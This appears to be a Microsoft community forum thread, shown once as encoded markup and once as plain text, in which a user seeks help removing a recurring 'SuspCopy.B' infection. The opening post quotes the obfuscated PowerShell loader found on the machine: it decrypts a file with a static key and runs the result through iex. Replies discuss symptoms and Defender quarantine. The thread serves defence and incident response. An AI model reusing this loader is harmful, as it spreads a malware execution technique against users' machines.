Need help with suspicious "Behavior:Win32/SuspCopy.B"

%3CLINGO-SUB%20id%3D%22lingo-sub-2732780%22%20slang%3D%22en-US%22%3ENeed%20help%20with%20suspicious%20%22Behavior%3AWin32%2FSuspCopy.B%22%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-2732780%22%20slang%3D%22en-US%22%3E%3CP%3EHello%2C%3C%2FP%3E%3CP%3Ethe%20system%20of%20a%20colleague%20is%20trying%20to%20block%20various%20attempt%20of%20the%20threat%20classified%20as%20%22Behavior%3AWin32%2FSuspCopy.B%22%3B%20I%20found%20that%20the%20antivirus%20block%20it%20but%20after%20some%20times%20it%20find%20it%20again%3B%20the%20threath%20create%20a%20random%20directory%20under%20the%20path%20C%3A%5CUsers%5C%5Bmy%20colleague%20account%5D%5CAppData%5CRoaming%3B%20if%20I%20try%2C%20I%20can%20delete%20the%20files%20inside%20but%20not%20the%20directory%3B%20as%20a%20side%20effect%2C%20every%20time%20that%20the%20antivurs%20find%20a%20new%20attempt%2C%20a%20pop%20up%20shows%20that%20a%20particular%20.tmp%20files%20is%20not%20found%3A%20the%20pop%20up%20is%20a%20wsh%20pop%20up%20and%20I%20suppose%20a%20vbscript%20is%20executed%20when%20there%20is%20this%20issue.%3C%2FP%3E%3CP%3EOne%20of%20the%20file%20that%20I%20have%20found%20is%20a%20powershell%20script%20like%20this%3A%3CBR%20%2F%3E%3CBR%20%2F%3E%3C%2FP%3E%3CPRE%20class%3D%22lia-code-sample%20language-powershell%22%3E%3CCODE%3Etry%7BImport-Certificate%3AImport-StartLayout%0AGet-PSSessionConfiguration%3AImport-BinaryMiLog%0AUnregister-UevTemplate%3ASet-AppvPublishingServer%7Dcatch%7B%0A%0A%24kJzClF%3D%22pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi%22%20-replace%20%22QMO%7CGCbA%7CRKiYY%7CsyNM%7CGECrJo%7CQrjClQ%7CjjS%7CbNHdd%7CVmNKU%7CeMplzOr%7CXvLi%22%3B%0Atry%7BAdd-AppxPackage%3AEnable-PSBreakpoint%0AInvoke-CommandInDesktopPackage%3AGet-RunspaceDebug%0AClear-UevConfiguration%3ADebug-Process%7Dcatch%7B%7D%0A%24NJeDKxLmAJtftkbNcthp%3DGet-WmiObject%20win32_process%20-Filter%20%22name%3D%22%22powershell.exe%22%22%22%20%7C%20where%20%7B%24_.CommandLine%20-match%20%22iXxpLQjg%22%7D%3B%0Aif%20(%24NJeDKxLmAJtftkbNcthp%5B1%5D%20-eq%20%24null)%7B%0A%24pAWzZWnnbaODWSIlGcI%3D%40(1..16)%3B%0A%24wXXale%3D%5BSystem.Runtime.InteropServices.Marshal%5D%0A%24FJZARstrPhaUvJ%3D%20Get-Content%20%22main.sh%22%0A%24BkbxfgOkWGcdUJu%3D%20ConvertTo-SecureString%20%24FJZARstrPhaUvJ%20-key%20%24pAWzZWnnbaODWSIlGcI%3B%0A%24qOXGbSpmuvBSmvlkW%20%3D%20%24wXXale%3A%3ASecureStringToBSTR(%24BkbxfgOkWGcdUJu)%3B%0Atry%7BShow-EventLog%3AGet-WheaMemoryPolicy%0AGet-NonRemovableAppsPolicy%3ASet-AppLockerPolicy%0ASet-AppxDefaultVolume%3ADisable-PSSessionConfiguration%7Dcatch%7B%24upd%3D'iXxpLQjg'%3B%7D%0A%24zApeVzJjF%20%3D%20%24wXXale%3A%3APtrToStringAuto(%24qOXGbSpmuvBSmvlkW)%3B%0Atry%7BWrite-Host%3APublish-AppvClientPackage%0ASet-LocalUser%3AInvoke-WmiMethod%0ASet-WmiInstance%3ANew-WindowsImage%7Dcatch%7B%7D%0A%24zApeVzJjF%20-replace%20%22MJqsMVgvkpp%22%20%7C%20iex%3B%7D%7D%3C%2FCODE%3E%3C%2FPRE%3E%3CP%3EI%20also%20tried%20to%20do%20a%20scan%20with%20Microsoft%20Security%20Scanner%20but%20without%20a%20success.%3C%2FP%3E%3CP%3EHas%20someone%20any%20idea%20how%20I%20could%20eradicate%20this%20threath%3F%3C%2FP%3E%3CP%3E%26nbsp%3B%3C%2FP%3E%3CP%3E--%3C%2FP%3E%3CP%3ERegards%3C%2FP%3E%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-2732847%22%20slang%3D%22en-US%22%3ERe%3A%20Need%20help%20with%20suspicious%20%22Behavior%3AWin32%2FSuspCopy.B%22%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-2732847%22%20slang%3D%22en-US%22%3EInteresting%2C%20does%20your%20colleague%20know%20the%20source%20of%20the%20script%3F%20Are%20you%20able%20to%20quarantine%20the%20file%20from%20defender%20atp%20console%3F%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-2733991%22%20slang%3D%22en-US%22%3ERe%3A%20Need%20help%20with%20suspicious%20%22Behavior%3AWin32%2FSuspCopy.B%22%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-2733991%22%20slang%3D%22en-US%22%3EHi%2C%20it%20should%20be%20possible%20from%20the%20console%20to%20quarantine%20it%3CBR%20%2F%3E%3CA%20href%3D%22https%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Fmicrosoft-365%2Fsecurity%2Fdefender%2Fm365d-autoir%22%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%3Ehttps%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Fmicrosoft-365%2Fsecurity%2Fdefender%2Fm365d-autoir%3C%2FA%3E%3C%2FLINGO-BODY%3E
Contributor

Hello,

the system of a colleague is trying to block various attempt of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus block it but after some times it find it again; the threath create a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivurs find a new attempt, a pop up shows that a particular .tmp files is not found: the pop up is a wsh pop up and I suppose a vbscript is executed when there is this issue.

One of the file that I have found is a powershell script like this:

try{Import-Certificate:Import-StartLayout
Get-PSSessionConfiguration:Import-BinaryMiLog
Unregister-UevTemplate:Set-AppvPublishingServer}catch{

$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
try{Add-AppxPackage:Enable-PSBreakpoint
Invoke-CommandInDesktopPackage:Get-RunspaceDebug
Clear-UevConfiguration:Debug-Process}catch{}
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$pAWzZWnnbaODWSIlGcI=@(1..16);
$wXXale=[System.Runtime.InteropServices.Marshal]
$FJZARstrPhaUvJ= Get-Content "main.sh"
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
try{Show-EventLog:Get-WheaMemoryPolicy
Get-NonRemovableAppsPolicy:Set-AppLockerPolicy
Set-AppxDefaultVolume:Disable-PSSessionConfiguration}catch{$upd='iXxpLQjg';}
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
try{Write-Host:Publish-AppvClientPackage
Set-LocalUser:Invoke-WmiMethod
Set-WmiInstance:New-WindowsImage}catch{}
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner but without a success.

Has someone any idea how I could eradicate this threath?

 

--

Regards

5 Replies
Interesting, does your colleague know the source of the script? Are you able to quarantine the file from defender atp console?

Hello @rs8091 

no, my colleague doesn't know how her system is infected. We activated the preview of Microsoft Defender Endpoint P1 and I can see this:

 

Threat 1.pngThreat 2.png

These are not generated by that file but I have seen that in many random directory that the threat create there is always a powershell file with that code inside.

I don't know if I can quarantine it.

Any help is appreciated.

 

Thanks.

Hello @rs8091 

 

thanks for your reply. I've seen the link and also on our dashboard but I don't see the possibility; we have activated the preview of Microsoft 365 Defender for Endpoint P1, I d.

I also see that the script that I copied on this forum, is not seen in the alert tree.

 

For what I see today, on my colleague C:\Users\[colleague_account]\AppData\Roaming there is a directory "obUwHjQXC" that has the following files as in the image:

 

Threat 3.png

I also see that every hour 30/60 minutes the svchost.temp is refreshed; also, I suppose that when Defender recognize the infection, the virus is blocked and so start the dialog in the image:

 

Threat 4.png

I tried to create again the directory and the file, even if empy because I don't know the contents of the .tmp file; after some time I checked and see that the file recreated remains empty and the dialog when the problem shows again is this:

 

Threat 6.png

Other thing that I noticed in past days, that the files 0_[something].log and 1_[something].log change every day: yesterday there si Teams, the day before Chrome.

This is what I see on the endpoint; instead, what I see on the alerts on the Defender dashboard is something like this in the picture (see that it seems that sometimes the virus uses the bitsdmin.exe to transfer data I don't know where):

 

Threat 5.png

The time is the same that I find on the pc. I also found many many entries in task scheduler: I now disactivated all the, I suppose, related to the threat, but I can't see nothing that can help me to understand what starts the virus

 

Threat 8.png

Hope this can help to understand better and help.

 

Thanks a lot.

 

 

Hello Marco,
if you click on the events in the ATP console (4th picture) on the right should open a panel with options how to remediate/block/quarantine the files. Is it available?